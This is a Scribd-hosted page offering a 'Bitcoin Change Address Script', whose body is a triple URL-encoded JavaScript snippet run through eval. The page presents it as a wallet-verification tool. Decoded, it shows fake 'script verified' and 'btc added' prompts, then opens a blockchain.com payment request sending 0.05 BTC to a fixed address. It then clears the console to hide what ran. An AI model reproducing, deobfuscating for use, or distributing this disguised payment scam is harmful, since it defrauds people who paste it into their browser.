50% found this document useful (2 votes)
2K views

Bitcoin Change Address Script

This document contains JavaScript code that prompts the user to verify a Bitcoin wallet address and check their balance. It asks the user to confirm that a Bitcoin amount has been added to their account. If confirmed, it opens their blockchain wallet page. Otherwise, it alerts the user to verify the script again.

Uploaded by

Frp Lock
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
50% found this document useful (2 votes)
2K views

Bitcoin Change Address Script

This document contains JavaScript code that prompts the user to verify a Bitcoin wallet address and check their balance. It asks the user to confirm that a Bitcoin amount has been added to their account. If confirmed, it opens their blockchain wallet page. Otherwise, it alerts the user to verify the script again.

Uploaded by

Frp Lock
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('var%252520r7gxo

%252520%25253D%252520parseFloat%252528prompt
%252528%252522https%25253A%25252F%25252Fwww.blockchain.com%25252Fbtc%25252Ftx
%25252F%252522%252529%252529%25253B%25250Avar
%252520r7gxo%252520%25253D%252520parseFloat%252528prompt%252528%252522Your
%252520script%252520is%252520now%252520verified
%252520with%252520your%252520BlockChain%252520wallet%252520and before%252520you
%252520can%252520take%252520this
%252520action.%252520Please%252520check%252520this%252520adress%252520is
%252520%252528your%252529%252520receiving
%252520adress%252520or%252520not%25253A%252522%25252C
%2525221DWNFWQeedPWvsRo5V1RpxwMwBARaRZ8uJ%252522%252529%252529%25253B
%25250Avar%252520w8ugo%252520%25253D%252520window.confirm%252528%252522the
%252520btc%252520is%252520now%252520added%252520to
%252520your%252520account%252520before%252520you%252520can%252520exit%252520this
%252520section.%252520check%252520your
%252520balance%252520in%252520your wallet%252522%252529%25253B%25250Aif
%252520%252528w8ugo%252529%252520%25257B
%252520window.open%252528%252527https%25253A%25252F%25252Fwww.blockchain.com
%25252Fbtc%25252Fpayment_request%25253Faddress
%25253D1DWNFWQeedPWvsRo5V1RpxwMwBARaRZ8uJ%252526message%25253DScript
%25252520Verification%252526amount
%25253D0.05%252527%252529%25253B%252520%25257D%252520%25250Aelse%252520%25257B
%252520alert%252528%252522Please%252520back
%252520to%252520verify%252520script.%252522%252529%25253B%252520%25257D
%252520%25250Aconsole.clear%252528%252529%25253B
%25250Aconsole.log%252528%252527Script%252520is%252520verified
%252521%252527%252529%25253B'))));

You might also like